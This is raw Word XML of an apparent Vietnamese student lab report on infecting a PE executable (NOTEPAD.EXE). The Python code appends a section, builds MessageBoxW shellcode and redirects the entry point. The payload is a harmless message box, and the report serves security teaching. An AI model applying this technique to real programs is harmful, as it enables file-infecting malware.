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742ED17" wp14:paraId="2BB67B46" wp14:textId="0E20B5E2">
      <w:pPr>
        <w:spacing w:after="120"/>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Các bước thực hiện/ Phương pháp thực hiện/Nội dung tìm hiểu (Ảnh chụp màn hình, có giải thích)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="5E05FA69" wp14:textId="7BABF72A">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1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mức yêu cầu 01 - RQ01 (3đ):</w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thực hiện chèn mã độc vào process bình thường bằng cách sử dụng section .reloc, tạo và nối mới section trong tập tin thực thi để tiêm payload của virus (hoặc kỹ thuật process hollowing).</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="5435452E" wp14:textId="6014A386">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Nhóm em thực hiện việc dùng Python và các thư viện hỗ trợ để tạo cơ chế lây nhiễm vào tập tin mục tiêu đầu tiên. Các thư viện đó bao gồm:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="3BFEEDA4" wp14:textId="245C8369">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shutil</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="60724766" wp14:textId="6DBAE883">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pefile</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4406C6DE" wp14:textId="6026839F">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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2FD8FDF0" wp14:textId="2C8164AD">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Trong đó:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="09403B60" wp14:textId="1BF34524">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shutil: thư viện này cung cấp nhiều hàm giúp thực hiện các thao tác với file và collections của file, chẳng hạn như copy và di chuyển file.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="143115BE" wp14:textId="3A422C90">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pefile: là một thư viện Python cho phép đọc, sửa đổi và viết lại PE files.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4405F949" wp14:textId="2C18A60E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>os: thư viện này cung cấp một cách để tương tác với hệ thống hệ điều hành. Trong chương trình này nhóm em sử dụng os.path.getsize để lấy kích thước của file, và os.SEEK_END để đặt vị trí con trỏ file ở cuối file khi đang mở file để thêm data.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="36D1DC19" wp14:textId="094BFE1D">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Đầu tiên em sẽ xác định thư mục có nhưng file như sau:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="685890DD" wp14:textId="525C7F63">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:eastAsia="Segoe UI" w:cs="Segoe UI"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="61427DF6">
        <w:drawing>
          <wp:inline xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" wp14:editId="31310B7D" wp14:anchorId="630B97BE">
            <wp:extent cx="5724524" cy="2705100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2136825592"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6a8fde65b5004309">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724524" cy="2705100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7D7592BE" wp14:textId="18AF2770">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Đầu tiên sẽ tạo 1 file giống với file gốc có tên là *-inject.exe:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="3840FA36" wp14:textId="043E0FC6">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Danh sách các file nguồn</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="39F60A37" wp14:textId="04DFA96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filenames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"NOTEPAD.EXE"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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4EDD372D" wp14:textId="1E1F5E6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786376C5" wp14:textId="799B4F1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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2C4FA246" wp14:textId="2A5DA89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343F7C70" wp14:textId="77C56BC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Lặp qua mỗi file trong danh sách và tạo file mới có tên kết thúc bằng "-inject.exe"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2009CDB9" wp14:textId="5756B3C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80D6C4B" wp14:textId="1EA1B82B">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Tạo tên file mới</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="159894EE" wp14:textId="7B891E2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-inject.exe"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Cắt phần ".exe" và thêm "-inject.exe"</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="01A82FA7" wp14:textId="3DF5B4E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append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E11AC08" wp14:textId="1041DA8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p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="1A26055D" wp14:textId="323282C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Copy file nguồn sang file mới</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="13BCDE41" wp14:textId="13B643D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shutil</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copyfile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5073638" wp14:textId="512EB417">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Sau đó thì em sẽ sử dụng để lấy những thông tin cơ bản của file cần inject payload bao gồm AddressOfEntryPoint, ImageBase, VirtualSize, VirtualAddress(VA), RawSize, RawAddress(RA) và size hiện tại của file.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2DEA8722" wp14:textId="68ADD8C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path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getsize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4D6EC37" wp14:textId="59CAD23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Load file PE</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="260FFA23" wp14:textId="60B5BAB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pefile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.PE(</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7C78FA9" wp14:textId="18936C0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001E110D" wp14:textId="0F53A9F4">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Lấy thông tin từ Optional Header</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="04B75BB0" wp14:textId="4356E96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.OPTIONAL_HEADER.AddressOfEntryPoint</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="047AE2BD" wp14:textId="7B6C75E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.OPTIONAL_HEADER.ImageBase</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="0519FBF7" wp14:textId="10B9852E">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Lấy thông tin từ Section Header của section cuối cùng</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="626549CF" wp14:textId="41B19E1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.sections:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="7A351E8B" wp14:textId="47FAB2D0">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.sections[</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1</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Section cuối cùng trong danh sách các section</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="3061DF47" wp14:textId="3D8B93A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virtual_size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.Misc_VirtualSize</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="5BCDEDED" wp14:textId="0BE46D5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.VirtualAddress</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="229620DA" wp14:textId="7AB57D7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.SizeOfRawData</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="17C6430A" wp14:textId="70615D2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pointer_to_raw_data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.PointerToRawData</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2AEAA0EF" wp14:textId="178C4B6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name_section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.Name.decode().rstrip(</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\x00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EEE643C" wp14:textId="74E99F4A">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Sau khi đã lấy đầy đủ các thông số cần thiết thì mình sẽ lập đoạn code inject. Tương tự lab1 đoạn mã sẽ có dạng như sau:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="565DB612" wp14:textId="4F8C7DFA">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#include</w:t>
      </w:r>
      <w:r w:rsidRPr="3742ED17" w:rsidR="61427DF6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="569CD6"/>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&lt;windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="134FBF96" wp14:textId="79BFD9F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569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>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main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argc</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char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argv</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82205E7" wp14:textId="436D0B3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E1416CB" wp14:textId="1552E87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MessageBox</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NULL</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"Caption"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MB_OK);</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="33126318" wp14:textId="06A4206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335EF79" wp14:textId="4E0512E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370D0FE" wp14:textId="3CE5DE9F">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Sau khi biên dịch thì sẽ có được 1 dạng mã asm như sau:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="26B03F48" wp14:textId="212A4B31">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push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6a 00</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="3FD25C20" wp14:textId="299AB1EF">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push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Caption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68 X</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="090F6737" wp14:textId="616C286F">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push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68 Y</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="1873D0B9" wp14:textId="031C4E8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push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6a 00</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4F2A7141" wp14:textId="494AE338">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569CD6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</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ff15 Z</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="5EA9F2BD" wp14:textId="3EB3E22D">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>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7B90294E" wp14:textId="5806C564">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Theo như đoạn mã trên thì ta cần có địa chỉ của hàm MessageBoxW được import từ thư viện USER32.dll. Sau đây là cách lấy địa chỉ đó:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="4B1B9D8F" wp14:textId="0405405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Kiểm tra xem có import table không và lấy thông tin</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="6BECB852" wp14:textId="64563DCB">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BE794DC" wp14:textId="73D64CC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hasattr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'DIRECTORY_ENTRY_IMPORT'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3B6CE96" wp14:textId="437B2F5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entry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.DIRECTORY_ENTRY_IMPORT:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="22C055EC" wp14:textId="0FE8477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Tìm thư viện USER32.dll</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="47A27EFF" wp14:textId="73CBF0E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entry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.dll.decode().lower()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'user32.dll'</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C594141" wp14:textId="35E9115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imp</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entry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.imports:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="6D487254" wp14:textId="1133FD20">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Tìm hàm MessageBoxW</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="0C59B523" wp14:textId="5DC483D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imp</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.name.decode()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92FD0F7" wp14:textId="57CFB5D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imp</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.address</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="36DBC9CB" wp14:textId="425BECA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"MessageBoxW address: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hex</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imp</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.address)</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110CEDA" wp14:textId="354B3F6E">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="C586C0"/>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break</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="11BC6199" wp14:textId="48DD598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else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7A42934" wp14:textId="45BE432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"No import table found."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DB89A1F" wp14:textId="3A116B63">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 xml:space="preserve">Sử dụng việc chèn sau file nên ta cần phải mở rộng file tức là chèn ở cuối file 1 đoạn. </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="318F0832" wp14:textId="5E75738E">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Số lượng byte muốn thêm vào cuối file</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="325A3B92" wp14:textId="31739AD4">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500</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="77D81016" wp14:textId="2A16439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067A0086" wp14:textId="5E45A88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Mở file ở chế độ append binary ('ab') và sử dụng os to seek to the end of the file</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="552B7E41" wp14:textId="686F609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'ab'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67F2398" wp14:textId="197775D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SEEK_END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Di chuyển con trỏ đến cuối file</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="24301D14" wp14:textId="227D7C38">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\x00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Thêm 500 byte giá trị 0x00</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="0B43DFA3" wp14:textId="0F2311D9">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Thực hiện 1 số công thức tính toán để tìm chính xác địa chỉ các câu lệnh khi thực thi. Sau đây là các công thức sau:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="42F164AA" wp14:textId="720C22B3">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>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736FDD74" wp14:textId="528D0FA4">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>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05301017" wp14:textId="54DA7C61">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Đối với công thức 1 thì mình sẽ tính địa chỉ của Caption, Text và New entry point.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="77FCBB22" wp14:textId="24DE2366">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Còn đối với công thức thứ 2 là ở vị trí lệnh jump thì trước đó đã có 5 câu lệnh khác nên phải cộng thêm 1 khoảng là 0x14 vào và lệnh jump có 5 byte nên sẽ là 0x19</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="51C02DB5" wp14:textId="0B69522E">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caption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40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pointer_to_raw_data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64266A67" wp14:textId="328F6BD5">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80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pointer_to_raw_data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1EE8DA97" wp14:textId="6C1A38AE">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pointer_to_raw_data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45FB84B6" wp14:textId="497DD4F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relative_VA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19</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CCFF864" wp14:textId="61611F8A">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Bước tiếp theo sau khi đã thực hiện việc tính toán là ta sẽ phải chuyển bị shell code. Như đoạn mã asm ở trên thì nhóm em có shell code như sau:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="06B04DAD" wp14:textId="581ECDB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#push 0</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="6C36228D" wp14:textId="575C7A94">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\x6a\x00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F3C3982" wp14:textId="429ADE3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#push caption</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="6DD9A44D" wp14:textId="129F2F2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\x68</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caption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byteorder</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A93BE17" wp14:textId="24E1C441">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#push text</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2FAA3216" wp14:textId="3F9C45A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\x68</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byteorder</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CD54D60" wp14:textId="34D72DD4">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#push 0</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="5EA9B5D2" wp14:textId="0A7E5B7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\x6a\x00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DE329E7" wp14:textId="43DE837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#call MessageBoxW</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="75390264" wp14:textId="3BB5EBC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\xff\x15</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byteorder</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C364115" wp14:textId="269C337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#jmp to original entry point</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="182504B1" wp14:textId="251895B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\xe9</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relative_VA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byteorder</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signed</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True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DE0C05D" wp14:textId="5D04050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37ACCF4F" wp14:textId="7A462BB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#Chuẩn bị caption và text</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="250CD8F6" wp14:textId="38005A36">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caption_text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\x49\x00\x6E\x00\x66\x00\x65\x00\x63\x00\x74\x00\x69\x00\x6F\x00\x6E\x00\x20\x00\x62\x00\x79\x00\x20\x00\x4E\x00\x54\x00\x32\x00\x33\x00\x30\x00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5B0F881" wp14:textId="700036FC">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text_text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\x32\x00\x31\x00\x35\x00\x32\x00\x32\x00\x30\x00\x36\x00\x35\x00\x2D\x00\x32\x00\x31\x00\x35\x00\x32\x00\x31\x00\x39\x00\x35\x00\x35\x00\x2D\x00\x32\x00\x31\x00\x35\x00\x32\x00\x30\x00\x32\x00\x33\x00\x37\x00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B346343" wp14:textId="04E7C0B1">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Bước cuối cùng là thực hiện chèn vào file đã được copy từ trước và chỉnh lại các thông số như VirtualSize, RawSize, SizeOfImage (Vì đã mở rộng file để tiêm shell code) và chỉnh lại Entry Point:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="65BAF01F" wp14:textId="67856A2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'r+b'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3039052" wp14:textId="20CEFBF1">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đến vị trí chèn</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="2396C964" wp14:textId="76B5B01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18B2CDB" wp14:textId="6A2DB018">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Chèn chuỗi byte</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="78E67C82" wp14:textId="3495E60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0D1F182" wp14:textId="3DB931E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63335B94" wp14:textId="010D8C4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đến vị trí chèn</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="193E295E" wp14:textId="77FFF18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40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9ABCF7B" wp14:textId="1980174E">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Chèn chuỗi byte</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="456983C9" wp14:textId="24F8BED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caption_text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61C280B" wp14:textId="04D7292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4935809E" wp14:textId="6FD208A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đến vị trí chèn</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="0A086916" wp14:textId="25872AF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80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5131658" wp14:textId="58EFE574">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Chèn chuỗi byte</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="38812402" wp14:textId="1BB3272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text_text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AE0F008" wp14:textId="51EFD67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0CFEF161" wp14:textId="536CEAE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'r+b'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21D93F4" wp14:textId="481D53A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Thay đổi .rsrc Section Header</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="3742ED17" wp14:paraId="1FB61C17" wp14:textId="6147881A">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.Misc_VirtualSize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p>
